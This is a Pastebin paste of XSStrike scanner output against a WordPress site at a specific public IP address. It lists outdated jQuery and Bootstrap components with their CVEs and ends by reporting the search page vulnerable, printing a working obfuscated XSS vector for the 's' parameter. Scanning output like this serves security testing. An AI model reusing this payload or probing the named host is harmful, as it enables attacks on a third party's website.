SHARE
TWEET

xss scanner response

a guest Feb 16th, 2020 62 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. XSStrike v3.1.4
  2.  
  3. [~] Crawling the target
  4. ------------------------------------------------------------
  5. [+] Vulnerable component: jquery v1.12.4
  6. [!] Component location: http://35.180.123.42/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
  7. [!] Total vulnerabilities: 3
  8. [!] Summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
  9. [!] Severity: low
  10. [!] CVE: CVE-2019-11358
  11. [!] Summary: 3rd party CORS request may execute
  12. [!] Severity: medium
  13. [!] CVE: CVE-2015-9251
  14. [!] Summary: parseHTML() executes scripts in event handlers
  15. [!] Severity: medium
  16. [!] CVE: CVE-2015-9251
  17. ------------------------------------------------------------
  18. ------------------------------------------------------------
  19. [+] Vulnerable component: jquery-migrate v1.4.1
  20. [!] Component location: http://35.180.123.42/wordpress/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
  21. [!] Total vulnerabilities: 0
  22. ------------------------------------------------------------
  23. ------------------------------------------------------------
  24. [+] Vulnerable component: bootstrap v3.3.4
  25. [!] Component location: http://35.180.123.42/wordpress/wp-content/themes/integral/js/bootstrap.min.js?ver=3.3.4
  26. [!] Total vulnerabilities: 4
  27. [!] Summary: XSS in collapse data-parent attribute
  28. [!] Severity: medium
  29. [!] CVE: CVE-2018-14040
  30. [!] Summary: XSS in data-template, data-content and data-title properties of tooltip/popover
  31. [!] Severity: high
  32. [!] CVE: CVE-2019-8331
  33. [!] Summary: XSS in data-target property of scrollspy
  34. [!] Severity: medium
  35. [!] CVE: CVE-2018-14041
  36. [!] Summary: XSS in data-container property of tooltip
  37. [!] Severity: medium
  38. [!] CVE: CVE-2018-14042
  39. ------------------------------------------------------------
  40. ------------------------------------------------------------
  41. [+] Vulnerable component: jquery.prettyPhoto v3.1.6
  42. [!] Component location: http://35.180.123.42/wordpress/wp-content/themes/integral/js/jquery.prettyPhoto.js?ver=3.1.6
  43. [!] Total vulnerabilities: 0
  44. ------------------------------------------------------------
  45. ------------------------------------------------------------
  46. [+] Vulnerable component: jquery v1.12.4
  47. [!] Component location: http://s.w.org/wp-includes/js/jquery/jquery.js?v=1.11.1
  48. [!] Total vulnerabilities: 3
  49. [!] Summary: jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution
  50. [!] Severity: low
  51. [!] CVE: CVE-2019-11358
  52. [!] Summary: 3rd party CORS request may execute
  53. [!] Severity: medium
  54. [!] CVE: CVE-2015-9251
  55. [!] Summary: parseHTML() executes scripts in event handlers
  56. [!] Severity: medium
  57. [!] CVE: CVE-2015-9251
  58. ------------------------------------------------------------
  59. [++] Vulnerable webpage: http://35.180.123.42/wordpress/
  60. [++] Vector for s: <htMl%0dOnpOiNTeReNTER%09=%09(confirm)()%0dx//
  61.  !] Progress: 16/16
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top